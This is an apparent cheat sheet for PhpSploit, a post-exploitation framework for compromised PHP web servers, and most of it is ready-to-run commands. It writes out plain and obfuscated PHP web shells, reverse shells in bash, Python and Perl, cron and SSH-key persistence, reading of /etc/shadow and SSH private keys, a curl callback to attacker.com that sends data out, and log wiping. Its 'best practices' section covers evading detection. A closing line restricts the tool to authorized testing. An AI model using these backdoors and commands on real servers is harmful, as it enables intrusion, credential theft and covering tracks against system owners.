PhpSploit
Overview
PhpSploit is a remote administration framework designed for stealth post-exploitation activities on compromised PHP web servers. It operates through hidden PHP backdoors, allowing attackers to interact with compromised systems while evading detection. The framework provides command execution, file management, and system enumeration capabilities.
Key Features:
- Stealth PHP backdoor deployment
- Interactive remote shell environment
- File upload, download, and manipulation
- System enumeration and reconnaissance
- Memory-based operation (minimal disk footprint)
- Anti-detection capabilities
- Multi-session management
Installation
From GitHub
git clone https://github.com/nil0x42/phpsploit.git
cd phpsploit
chmod +x phpsploitRequirements
- Python 3.6+
- A web server with PHP execution capability
- Target web server accessible
Verify Installation
./phpsploit --version
./phpsploit --helpDocker
docker run -it --rm phpsploitBasic Setup
Start PhpSploit Console
./phpsploitConnect to Existing Backdoor
phpsploit> connect http://target.com/shell.phpDeploy New Backdoor
phpsploit> upload shell.php http://target.com/upload/Interactive Shell
phpsploit> shellCore Commands
| Command | Description |
|---|---|
connect | Connect to backdoor URL |
upload | Deploy backdoor to server |
download | Download file from server |
shell | Interactive command shell |
run | Execute system command |
set | Configure framework settings |
exploit | Run exploitation modules |
sessions | Manage active sessions |
help | Display command help |
quit | Exit framework |
Connection Management
Connect to Backdoor
phpsploit> connect http://target.com/index.php
phpsploit> connect http://target.com:8080/shell.php
phpsploit> connect http://target.com/admin/upload/shell.phpConnection with Proxy
phpsploit> set proxy http://127.0.0.1:8080
phpsploit> connect http://target.com/shell.phpAuthentication
phpsploit> set user admin
phpsploit> set password secret123
phpsploit> connect http://target.com/shell.phpSession Management
phpsploit> sessions
phpsploit> sessions 1
phpsploit> sessions -k 1 # Kill sessionRemote Command Execution
Execute Single Command
phpsploit> run id
phpsploit> run whoami
phpsploit> run pwd
phpsploit> run uname -aInteractive Shell Mode
phpsploit> shell
[shell]> id
[shell]> whoami
[shell]> ls -la
[shell]> exitExecute Shell Scripts
phpsploit> run bash -c "for i in {1..10}; do echo $i; done"
phpsploit> run sh -c "cat /etc/passwd"
phpsploit> run perl -e 'print "Hello\n"'Background Command Execution
phpsploit> run nohup bash -i >& /dev/tcp/attacker.com/4444 0>&1 &File Operations
Upload Files
phpsploit> upload /path/to/local/file.txt /var/www/html/
phpsploit> upload shell.php /var/www/html/uploads/
phpsploit> upload /path/to/payload.elf /tmp/Download Files
phpsploit> download /etc/passwd ./password_dump.txt
phpsploit> download /var/www/html/config.php ./config_backup.php
phpsploit> download /etc/shadow ./shadow_dumpList Remote Directory
phpsploit> run ls -la /var/www/html/
phpsploit> run find /var/www/html -type f -name "*.php"
phpsploit> run du -sh /var/www/html/*Create/Modify Files
phpsploit> run echo "<?php system(\$_GET['c']); ?>" > /var/www/html/shell.php
phpsploit> run cat > /tmp/malware.sh << EOF
# malware script here
EOFSystem Enumeration
Get System Information
phpsploit> run uname -a
phpsploit> run cat /etc/os-release
phpsploit> run hostnamectl
phpsploit> run whoami
phpsploit> run idNetwork Information
phpsploit> run ip addr show
phpsploit> run ifconfig
phpsploit> run netstat -tulpn
phpsploit> run ss -tulpnProcess Enumeration
phpsploit> run ps aux
phpsploit> run ps aux | grep -i apache
phpsploit> run ps aux | grep -i nginxUser and Privilege Information
phpsploit> run cat /etc/passwd
phpsploit> run sudo -l
phpsploit> run cat /etc/sudoersDisk and Storage Information
phpsploit> run df -h
phpsploit> run mount
phpsploit> run lsblkBackdoor Deployment
PHP Backdoor Creation
# Simple one-liner backdoor
<?php system($_GET['cmd']); ?>
# More stealthy version
<?php if(isset($_POST['c'])){ echo "<pre>";system($_POST['c']);echo "</pre>"; } ?>
# Base64 encoded command execution
<?php system(base64_decode($_GET['x'])); ?>Deploy Backdoor via PhpSploit
phpsploit> upload backdoor.php /var/www/html/
phpsploit> connect http://target.com/backdoor.phpObfuscated Backdoor
# Variable obfuscation
<?php $a="sy"."st"."em"; $a($_GET['c']); ?>
# Function indirection
<?php $f=create_function('$x','return system($x);'); echo $f($_GET['c']); ?>Persistent Backdoor
# Write to web root with persistence
phpsploit> run echo '<?php system($_GET["c"]); ?>' > /var/www/html/.hidden/shell.php
phpsploit> run chmod 644 /var/www/html/.hidden/shell.phpPost-Exploitation Workflows
Privilege Escalation Enumeration
phpsploit> run sudo -l
phpsploit> run find / -perm -4000 2>/dev/null
phpsploit> run find / -writable 2>/dev/null | head -20
phpsploit> run cat /etc/crontabCredential Harvesting
phpsploit> run cat /etc/shadow
phpsploit> run cat /home/*/.bash_history
phpsploit> run cat /root/.ssh/id_rsaLateral Movement
# Enumerate internal network
phpsploit> run nmap -sn 192.168.1.0/24
phpsploit> run arp -a
# Scan for open ports
phpsploit> run netstat -tulpn | grep LISTENData Exfiltration
# Tar and compress sensitive files
phpsploit> run tar -czf /tmp/data.tar.gz /var/www/html/
# Encode for exfiltration
phpsploit> run base64 /tmp/data.tar.gz > /tmp/data.b64
# Download exfiltrated data
phpsploit> download /tmp/data.b64 ./exfiltrated_data.b64Advanced Configuration
Set User Agent
phpsploit> set user_agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
phpsploit> set user_agent "Custom-Agent/1.0"Proxy Configuration
phpsploit> set proxy http://127.0.0.1:8080
phpsploit> set proxy socks5://127.0.0.1:9050Timeout Settings
phpsploit> set timeout 30
phpsploit> set connect_timeout 10Request Headers
phpsploit> set headers "Authorization: Bearer token123"
phpsploit> set headers "X-Custom-Header: value"Verbosity and Logging
phpsploit> set verbosity 3
phpsploit> set logging on
phpsploit> set log_file ./phpsploit.logExploitation Techniques
Reverse Shell Deployment
# Bash reverse shell
phpsploit> run bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 &
# Python reverse shell
phpsploit> run python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])"
# Perl reverse shell
phpsploit> run perl -e "use Socket;$i='10.10.10.10';$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));connect(S,sockaddr_in($p,inet_aton($i)));exec('/bin/sh -i <&3 >&3 2>&3');"Cron Job Persistence
phpsploit> run crontab -l
phpsploit> run (crontab -l; echo "* * * * * /bin/bash -i >& /dev/tcp/10.10.10.10/4444 0>&1") | crontab -SSH Key Injection
phpsploit> run mkdir -p /root/.ssh
phpsploit> run echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keysDatabase Access
phpsploit> run mysql -u root -ppassword -e "SHOW DATABASES;"
phpsploit> run mysql -u root -ppassword wordpress -e "SELECT user_login, user_pass FROM wp_users;"Defense Evasion
Process Hiding
# Run command disassociated from parent
phpsploit> run nohup /path/to/command &
phpsploit> run setsid /path/to/commandTimestamp Manipulation
phpsploit> run touch -r /bin/ls /tmp/backdoor.php
phpsploit> run touch -t 202001010000 /tmp/backdoor.phpLog Sanitization
phpsploit> run cat /var/log/apache2/access.log | grep -v "shell.php"
phpsploit> run > /var/log/apache2/access.log
phpsploit> run cat /dev/null > ~/.bash_historyFirewall Bypass
# DNS tunneling
phpsploit> run nslookup attacker.com
# HTTP tunneling
phpsploit> run curl http://attacker.com/callback?data=$(whoami)Scripting and Automation
Create PhpSploit Script
#!/bin/bash
# automated_exploitation.sh
TARGET="http://target.com/shell.php"
phpsploit <<EOF
connect $TARGET
set verbosity 2
run id
run whoami
run pwd
run uname -a
download /etc/passwd ./passwd.txt
quit
EOFBatch Command Execution
phpsploit> run 'for i in {1..10}; do echo $i; done'
phpsploit> run 'find / -name "*.conf" 2>/dev/null | head -20'
phpsploit> run 'grep -r "password" /var/www/html 2>/dev/null'Real-World Attack Scenarios
Web Server Compromise
# 1. Upload backdoor
phpsploit> upload backdoor.php /var/www/html/
# 2. Connect to backdoor
phpsploit> connect http://target.com/backdoor.php
# 3. Enumerate system
phpsploit> run uname -a
phpsploit> run id
# 4. Create persistence
phpsploit> run echo "<?php system($_GET['c']); ?>" > /var/www/html/.htaccess.phpDatabase Extraction
# Identify database
phpsploit> run find / -name "*.env" | grep -i database
# Extract credentials
phpsploit> run cat /var/www/html/.env | grep DATABASE
# Dump database
phpsploit> run mysqldump -u root -p database > /tmp/dump.sql
phpsploit> download /tmp/dump.sql ./database_dump.sqlApplication Server Escalation
# Identify running services
phpsploit> run ps aux | grep -i "apache\|nginx\|tomcat"
# Check for vulnerable services
phpsploit> run netstat -tulpn
# Attempt local privilege escalation
phpsploit> run sudo -l
phpsploit> run find / -perm -4000 2>/dev/nullTroubleshooting
Connection Issues
# Verify backdoor accessibility
curl http://target.com/shell.php
# Test with different encoding
phpsploit> set encoding base64
phpsploit> connect http://target.com/shell.phpCommand Execution Problems
# Test basic commands
phpsploit> run echo test
phpsploit> run id
# Check PHP version
phpsploit> run php --versionFile Transfer Issues
# Verify file permissions
phpsploit> run ls -la /var/www/html/
# Check available space
phpsploit> run df -h /var/www/html/Security Best Practices
Operational Security
- Use VPN/proxy for all connections
- Rotate backdoor locations regularly
- Clean logs and evidence of activity
- Use encrypted communication when possible
- Establish dead drops for communication
Detection Avoidance
- Use legitimate PHP functions
- Avoid suspicious filenames
- Minimize footprint on disk
- Use appropriate timing for activities
- Monitor system for detection indicators
Version and Support
./phpsploit --versionLegal and Ethical Considerations
Critical: PhpSploit is designed for authorized penetration testing and red team exercises only. Unauthorized access to computer systems is illegal. Always obtain explicit written authorization before deploying backdoors or conducting post-exploitation activities. Misuse of this framework may result in serious legal consequences.